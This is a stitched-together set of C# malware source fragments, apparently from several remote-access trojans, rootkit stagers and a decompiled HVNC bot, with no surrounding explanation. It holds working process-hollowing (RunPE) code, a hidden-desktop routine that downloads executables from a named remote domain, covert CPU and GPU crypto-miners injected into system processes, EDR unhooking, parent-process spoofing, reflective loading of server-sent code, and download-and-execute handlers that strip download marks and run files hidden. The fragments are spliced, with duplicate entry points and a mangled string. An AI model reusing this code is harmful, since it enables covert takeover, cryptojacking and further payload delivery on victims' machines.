// Token: 0x060000E6 RID: 230 RVA: 0x00010928 File Offset: 0x0000EB28
public static void StartHVNC(string ipport)
{
if (!HVNC.Running)
{
HVNC.SA.bInheritHandle = -1;
HVNC.SA.lpSecurityDescriptor = (IntPtr)0L;
HVNC.hNewDesktop = HVNC.CreateDesktop("RemoteDesktop", (IntPtr)0L, (IntPtr)0L, 1u, 511u, HVNC.SA);
RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION);
RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION);
startup_INFORMATION.cb = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION));
startup_INFORMATION.lpDesktop = "RemoteDesktop";
string lpApplicationName = Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 3) + "Windows\\explorer.exe";
string lpCommandLine = null;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES = security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2;
RunPE.CreateProcess(lpApplicationName, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 0u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION);
WebClient webClient = new WebClient();
byte[] data;
if (Environment.Version.Major == 2)
{
data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC20.exe");
}
if (Environment.Version.Major == 4)
{
data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC40.exe");
}
RunPE.TryRun(Process.GetCurrentProcess().MainModule.FileName, ipport, data, true, true, "RemoteDesktop", ref HVNC.PID);
HVNC.Running = true;
}
}
public void RunMiner(MsgPack unpack_msgpack)
{
try
{
string xmrig = Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin";
string injectTo = unpack_msgpack.ForcePathObject("InjectTo").AsString;
string args = $"-B --donate-level=1 -t {Environment.ProcessorCount / 2} -v 0 --cpu-priority=3 -a cn/r -k -o {unpack_msgpack.ForcePathObject("Pool").AsString} -u {unpack_msgpack.ForcePathObject("Wallet").AsString} -p {unpack_msgpack.ForcePathObject("Pass").AsString}";
if (!File.Exists(xmrig))
{
//ask server to send xmrig
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "GetXmr";
Connection.Send(msgpack.Encode2Bytes());
return;
}
KillMiner();
if (RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injectTo), Zip.Decompress(File.ReadAllBytes(Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin")), args, false))
{
SetRegistry.SetValue(Connection.Hwid, "1");
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
// Loads Payload.exe (native executable) from resources and injects into suitable OS executable.
// This stage is required to be C#, because the startup stage may only contain C# code with a maximum of 260 characters for the commandline.
// The next stage is the actual payload, which is required to be a native executable in order to be injected.
public static void Main()
{
string path = Environment.Is64BitOperatingSystem ? @"C:\Windows\SysWOW64\svchost.exe" : @"C:\Windows\System32\svchost.exe";
byte[] payload = Decompress(Decrypt(Resources.Payload));
RunPE.Run(path, payload);
}
// The target framework is .NET 3.5.
// Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start.
// However, the target framework is not relevant in the powershell context.
// The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed.
// To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5.
public static void Main()
{
Process.EnterDebugMode();
// Get r77 service executable.
byte[] payload32 = Decompress(Decrypt(Resources.InstallService32));
byte[] payload64 = Decompress(Decrypt(Resources.InstallService64));
// Executable to be used for process hollowing.
string path = @"C:\Windows\System32\dllhost.exe";
string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe";
string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect).
// Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required.
int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id;
// Create the 32-bit and 64-bit instance of the r77 service.
if (Helper.Is64BitOperatingSystem())
{
if (IntPtr.Size == 4)
{
RunPE.Run(pathWow64, commandLine, payload32, parentProcessId);
}
else
{
RunPE.Run(path, commandLine, payload64, parentProcessId);
}
}
else
{
RunPE.Run(path, commandLine, payload32, parentProcessId);
}
}
// Token: 0x06000091 RID: 145 RVA: 0x0000B830 File Offset: 0x00009A30
public static void BTCGPU(string p1, string p2, string p3, bool hidden, string proxy = "")
{
try
{
if (!File.Exists(HandleMiner.BFGCLoc))
{
Functions.URLDownloadToFile(null, HandleMiner.BFGC, HandleMiner.BFGCLoc, 0, IntPtr.Zero);
}
}
catch (Exception ex)
{
return;
}
byte[] buffer = File.ReadAllBytes(HandleMiner.BFGCLoc);
byte[] pix_Sub_ = HandleMiner.ASDF(buffer, 8);
byte[] array = HandleMiner.PIX_Func_002_COIN(pix_Sub_);
if (proxy.Length > 1)
{
string fileName = Process.GetCurrentProcess().MainModule.FileName;
string cmd = string.Concat(new string[]
{
"-S opencl:auto --url=",
p1,
" -u ",
p2,
" -p ",
p3,
" --gpu-threads=2 --intensity=6 -x ",
proxy
});
byte[] data = array;
bool compatible = true;
string desktop = "";
int num = 0;
RunPE.TryRun(fileName, cmd, data, compatible, hidden, desktop, ref num);
}
else
{
string fileName2 = Process.GetCurrentProcess().MainModule.FileName;
string cmd2 = string.Concat(new string[]
{
"-S opencl:auto --url=",
p1,
" -u ",
p2,
" -p ",
p3,
" --gpu-threads=2 --intensity=6"
});
byte[] data2 = array;
bool compatible2 = true;
string desktop2 = "";
int num = 0;
RunPE.TryRun(fileName2, cmd2, data2, compatible2, hidden, desktop2, ref num);
}
}
// Token: 0x06000093 RID: 147 RVA: 0x0000BA8C File Offset: 0x00009C8C
public static void BTCCPU(string p1, string p2, string p3, bool hidden, string proxy = "")
{
try
{
if (!File.Exists(HandleMiner.CPUCLoc))
{
Functions.URLDownloadToFile(null, HandleMiner.CPUC, HandleMiner.CPUCLoc, 0, IntPtr.Zero);
}
}
catch (Exception ex)
{
return;
}
byte[] buffer = File.ReadAllBytes(HandleMiner.CPUCLoc);
byte[] array = HandleMiner.PIX_Func_002_COIN(HandleMiner.ASDF(buffer, 8));
if (proxy.Length > 1)
{
string fileName = Process.GetCurrentProcess().MainModule.FileName;
string cmd = string.Concat(new string[]
{
"--url=",
p1,
" --userpass="******":",
p3,
" --algo=sha256d --proxy=",
proxy
});
byte[] data = array;
bool compatible = true;
string desktop = "";
int num = 0;
RunPE.TryRun(fileName, cmd, data, compatible, hidden, desktop, ref num);
}
else
{
string fileName2 = Process.GetCurrentProcess().MainModule.FileName;
string cmd2 = string.Concat(new string[]
{
"--url=",
p1,
" --userpass="******":",
p3,
" --algo=sha256d"
});
byte[] data2 = array;
bool compatible2 = true;
string desktop2 = "";
int num = 0;
RunPE.TryRun(fileName2, cmd2, data2, compatible2, hidden, desktop2, ref num);
}
}
public void SendToMemory(MsgPack unpack_msgpack)
{
try
{
byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
if (injection.Length == 0)
{
//Reflection
new Thread(delegate()
{
try
{
Assembly loader = Assembly.Load(Methods.Decompress(buffer));
object[] parm = null;
if (loader.EntryPoint.GetParameters().Length > 0)
{
parm = new object[] { new string[] { null } };
}
loader.EntryPoint.Invoke(null, parm);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
})
{
IsBackground = true
}.Start();
}
else
{
//RunPE
new Thread(delegate()
{
try
{
RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), "", true);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
})
{
IsBackground = true
}.Start();
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
Connection.Disconnected();
}
// The target framework is .NET 3.5.
// Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start.
// However, the target framework is not relevant in the powershell context.
// The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed.
// To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5.
public static void Main()
{
// Unhook DLL's that are monitored by EDR.
// Otherwise, the call sequence analysis of process hollowing gets detected and the stager is terminated.
Unhook.UnhookDll("ntdll.dll");
if (Environment.OSVersion.Version.Major >= 10 || IntPtr.Size == 8)
{
// Unhooking kernel32.dll on Windows 7 x86 fails.
//TODO: Find out why unhooking kernel32.dll on Windows 7 x86 fails.
Unhook.UnhookDll("kernel32.dll");
}
Process.EnterDebugMode();
// Get r77 service executable.
byte[] payload32 = Decompress(Decrypt(Resources.InstallService32));
byte[] payload64 = Decompress(Decrypt(Resources.InstallService64));
// Executable to be used for process hollowing.
string path = @"C:\Windows\System32\dllhost.exe";
string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe";
string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect).
// Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required.
int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id;
// Create the 32-bit and 64-bit instance of the r77 service.
if (Helper.Is64BitOperatingSystem())
{
if (IntPtr.Size == 4)
{
RunPE.Run(pathWow64, commandLine, payload32, parentProcessId);
}
else
{
RunPE.Run(path, commandLine, payload64, parentProcessId);
}
}
else
{
RunPE.Run(path, commandLine, payload32, parentProcessId);
}
}
// Token: 0x0600009A RID: 154 RVA: 0x0000BD80 File Offset: 0x00009F80
public static int TryRun(string path, string cmd, byte[] data, bool compatible, bool hidden, string Desktop = "", ref int PID = 0)
{
try
{
int num = 1;
while (!RunPE.HandleRun(path, cmd, data, compatible, hidden, Desktop, ref PID))
{
num++;
if (num > 10)
{
return(0);
}
}
return(-1);
}
catch (Exception ex)
{
}
return(0);
}
// Token: 0x060000A5 RID: 165 RVA: 0x0000BDD0 File Offset: 0x00009FD0
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible, bool hidden = false, string Desktop = "", ref int PID = 0)
{
string text = string.Format("\"{0}\"", path);
RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION);
RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION);
startup_INFORMATION.cb = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION));
if (Desktop.Length > 0)
{
startup_INFORMATION.lpDesktop = Desktop;
}
if (hidden)
{
startup_INFORMATION.wShowWindow = 0;
startup_INFORMATION.dwFlags = 1;
}
try
{
if (!string.IsNullOrEmpty(cmd))
{
text = text + " " + cmd;
}
string lpCommandLine = text;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES = security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2;
if (!RunPE.CreateProcess(path, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 4u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION))
{
throw new Exception();
}
int num = BitConverter.ToInt32(data, 60);
int num2 = BitConverter.ToInt32(data, num + 52);
int[] array = new int[179];
array[0] = 65538;
if (IntPtr.Size == 4)
{
if (!RunPE.GetThreadContext(process_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
else if (!RunPE.Wow64GetThreadContext(process_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
int num3 = array[41];
int num4;
int num5;
if (!RunPE.ReadProcessMemory(process_INFORMATION.ProcessHandle, num3 + 8, ref num4, 4, ref num5))
{
throw new Exception();
}
if (num2 == num4 && RunPE.NtUnmapViewOfSection(process_INFORMATION.ProcessHandle, num4) != 0)
{
throw new Exception();
}
int length = BitConverter.ToInt32(data, num + 80);
int bufferSize = BitConverter.ToInt32(data, num + 84);
int num6 = RunPE.VirtualAllocEx(process_INFORMATION.ProcessHandle, num2, length, 12288, 64);
bool flag;
if (!compatible && num6 == 0)
{
flag = true;
num6 = RunPE.VirtualAllocEx(process_INFORMATION.ProcessHandle, 0, length, 12288, 64);
}
if (num6 == 0)
{
throw new Exception();
}
if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num6, data, bufferSize, ref num5))
{
throw new Exception();
}
int num7 = num + 248;
short num8 = BitConverter.ToInt16(data, num + 6);
int num9 = 0;
int num10 = (int)(num8 - 1);
for (int i = num9; i <= num10; i++)
{
int num11 = BitConverter.ToInt32(data, num7 + 12);
int num12 = BitConverter.ToInt32(data, num7 + 16);
int srcOffset = BitConverter.ToInt32(data, num7 + 20);
if (num12 != 0)
{
byte[] array2 = new byte[num12 - 1 + 1];
Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num6 + num11, array2, array2.Length, ref num5))
{
throw new Exception();
}
}
num7 += 40;
}
byte[] bytes = BitConverter.GetBytes(num6);
if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num3 + 8, bytes, 4, ref num5))
{
throw new Exception();
}
int num13 = BitConverter.ToInt32(data, num + 40);
if (flag)
{
num6 = num2;
}
array[44] = num6 + num13;
if (IntPtr.Size == 4)
{
if (!RunPE.SetThreadContext(process_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
else if (!RunPE.Wow64SetThreadContext(process_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
if (RunPE.ResumeThread(process_INFORMATION.ThreadHandle) == -1)
{
throw new Exception();
}
PID = (int)process_INFORMATION.ProcessId;
}
catch (Exception ex)
{
Process processById = Process.GetProcessById((int)process_INFORMATION.ProcessId);
if (processById != null)
{
processById.Kill();
}
return(false);
}
return(true);
}
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
{
string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
command.FileName);
try
{
if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
{
throw new Exception("No executable file");
}
MemorySplit destFile = new MemorySplit(filePath);
if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
{
new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute(
client);
return;
}
if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute
{
if (command.Type == "drop")
{
if (!destFile.DropFile())
{
new Packets.ClientPackets.Status(string.Format("Drop failed: {0}", destFile.LastError)).Execute(
client);
return;
}
DeleteFile(filePath + ":Zone.Identifier");
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = filePath;
Process.Start(startInfo);
new Packets.ClientPackets.Status("Executed File!").Execute(client);
}
else if (command.Type == "self")
{
byte[] dat = destFile.ToByteArray();
//File.WriteAllBytes("lol.exe", dat);
if (dat == null)
{
new Packets.ClientPackets.Status("Payload was null!").Execute(client);
return;
}
//Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
//a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "self", "" } });
RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "self", "" }, client);
}
else if (command.Type == "cmd")
{
byte[] dat = destFile.ToByteArray();
if (dat == null)
{
new Packets.ClientPackets.Status("Payload was null!").Execute(client);
return;
}
//Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
//a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "sys", "cmd" } });
RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "sys", "cmd" }, client);
}
else
{
new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
}
}
}
catch (Exception ex)
{
DeleteFile(filePath);
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.ToString())).Execute(client);
//MessageBox.Show(ex.ToString());
}
}
public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command,
Client client)
{
new Packets.ClientPackets.Status("Downloading file...").Execute(client);
new Thread(() =>
{
try
{
if (command.Type == "drop")
{
#region drop
string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
Helper.Helper.GetRandomFilename(12, ".exe"));
try
{
using (WebClient c = new WebClient())
{
c.Proxy = null;
c.DownloadFile(command.URL, tempFile);
}
}
catch
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
return;
}
new Packets.ClientPackets.Status("Downloaded File!").Execute(client);
try
{
DeleteFile(tempFile + ":Zone.Identifier");
var bytes = File.ReadAllBytes(tempFile);
if (bytes[0] != 'M' && bytes[1] != 'Z')
{
throw new Exception("Not an .EXE file!");
}
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = tempFile;
Process.Start(startInfo);
}
catch (Exception ex)
{
DeleteFile(tempFile);
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
return;
}
#endregion
}
else if (command.Type == "self")
{
byte[] fileBytes = Download(command.URL, client);
if (fileBytes == null)
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
}
RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "self", "" }, client);
}
else if (command.Type == "cmd")
{
byte[] fileBytes = Download(command.URL, client);
if (fileBytes == null)
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
}
RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "sys", "cmd" }, client);
}
else
{
new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
}
}
catch (Exception ex)
{
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
return;
}
new Packets.ClientPackets.Status("Executed File!").Execute(client);
}).Start();
}
public void Inject(byte[] payload, string target)
{
//Add actions if RunPe.Run returns false
RunPE.Run(payload, target);
}
